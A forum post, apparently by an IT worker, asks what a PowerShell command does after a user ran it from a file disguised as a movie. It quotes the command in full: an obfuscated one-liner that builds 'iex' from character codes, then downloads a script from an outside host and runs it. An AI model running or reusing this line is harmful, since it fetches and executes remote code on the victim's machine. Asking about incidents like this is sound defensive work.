I’m looking for clues here. Long story short, one of our users ran what he thought was a movie file on his company laptop. But the file isn’t a actually a movie but a Powershell script. Well said he double-clicked on the “movie file” but nothing happened, but I suspect something did happen.
Script is below:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char]@(0x69,0x65,0x58) -replace ’ ‘,’’;sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString(‘httpp://shortbit.xyz/psp’);s $nq
Could the experts chime in and tell me what this script does or attempt to do? I did check on the URL “shortbit.xyz/psp” in the script and it points to a link to a text file. I’m assuming it’s a text file that the script will use?